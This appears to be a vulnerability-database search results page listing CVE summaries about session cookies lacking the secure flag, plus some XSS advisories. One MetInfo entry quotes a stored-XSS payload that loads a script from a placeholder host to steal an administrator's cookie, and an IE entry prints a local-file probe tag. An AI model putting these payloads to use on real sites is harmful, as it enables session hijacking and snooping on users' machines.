
73 matches found

RedHat Linux
added 2015/04/07 3:8 p.m. | 0 views

novnc: session hijack through insecurely set session token cookies

It was discovered that noVNC did not properly set the 'secure' flag when issuing cookies. An attacker could use this flaw to intercept cookies via a man-in-the-middle attack...

4.3 CVSS | 5.8 AI score | 0.02183 EPSS
Exploits 0 | References 4
Prion
added 2014/09/12 1:55 a.m. | 19 views

Session fixation

IBM Jazz Team Server, as used in Rational Collaborative Lifecycle Management; Rational Quality Manager 3.x before 3.0.1.6 iFix 3, 4.x before 4.0.7, and 5.x before 5.0.1; and other Rational products, does not set the secure flag for the session cookie in an https session, which makes it easier for...

5 CVSS | 6.7 AI score | 0.01667 EPSS
Exploits 0 | References 2 | Affected Software 7
Cvelist
added 2014/08/07 10:0 a.m. | 22 views

CVE-2014-3853

Pyplate 0.08 does not set the secure flag for the id cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

6.5 AI score | 0.01296 EPSS
Exploits 1 | References 2
Prion
added 2013/06/21 2:55 p.m. | 12 views

Session fixation

The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 through 1.5.0.1 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5 CVSS | 6.8 AI score | 0.01354 EPSS
Exploits 0 | References 3 | Affected Software 1
myhack58
added 2013/02/23 12:0 a.m. | 16 views

Mastery OA contents of the log stored XSS can get the cookie-vulnerability warning-the black bar safety net

Mastery OA 2013 and 2010 version, Office Anywhere 2013 work log edit page there is the storage type XSS, and their superiors view the log after you can steal the cookie 1, the work log edit page source code to bypass the bypass a character can be constructed XSS! ! ! 1, the interception to giv...

1.5 AI score
Exploits 0
NVD
added 2011/12/16 11:55 a.m. | 14 views

CVE-2011-4728

The Server Administration Panel in Parallels Plesk Panel 10.2.0build1011110331.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies us...

5 CVSS | 6.5 AI score | 0.0116 EPSS
Exploits 0 | References 2
myhack58
added 2011/08/15 12:0 a.m. | 16 views

The latest MetInfo enterprise website management system V4.0 XSS 0Day-vulnerability warning-the black bar safety net

Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...

0.1 AI score
Exploits 0
ATTACKERKB
added 2011/01/18 6:3 p.m. | 2 views

CVE-2009-5051

Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5 CVSS | 5.6 AI score | 0.01064 EPSS
Exploits 0 | References 4
Prion
added 2011/01/18 6:3 p.m. | 12 views

Session fixation

Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5 CVSS | 7 AI score | 0.01064 EPSS
Exploits 0 | References 2
OSV
added 2009/12/23 6:30 p.m. | 3 views

DEBIAN-CVE-2009-3584

SQL-Ledger 2.8.24 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5 CVSS | 6.8 AI score | 0.01247 EPSS
Exploits 2 | References 1
Positive Technologies
added 2008/12/19 12:0 a.m. | 6 views

PT-2008-5423 · Open Source Matters · Joomla!

Name of the Vulnerable Software and Affected Versions: Joomla! version 1.5.8 Description: The issue makes it easier for remote attackers to capture the session cookie by intercepting its transmission within an http session, as the secure flag is not set for the session cookie in an https session...

7.5 CVSS | 7.4 AI score | 0.01257 EPSS
Exploits 0 | References 6
Prion
added 2008/12/03 5:30 p.m. | 16 views

Design/Logic Flaw

Octeth Oempro 3.5.5.1, and possibly other versions before 4, does not set the secure flag for the PHPSESSID cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5 CVSS | 7.1 AI score | 0.01324 EPSS
Exploits 1 | References 4 | Affected Software 1
myhack58
added 2007/12/17 12:0 a.m. | 12 views

An IE browser vulnerability security testing and analysis-vulnerability warning-the black bar safety net

Today saw on the Internet A IE little vulnerability. Do the following simple analysis The use method is as follows Program code: img src="sysimage://C:\WINNT\Notepad.exe,7 7 7" onError="document. write’bFile Exists!& lt;/b’;" Just start very strange this sysimage://is a Protocol,so in IE into:...

0.1 AI score
Exploits 0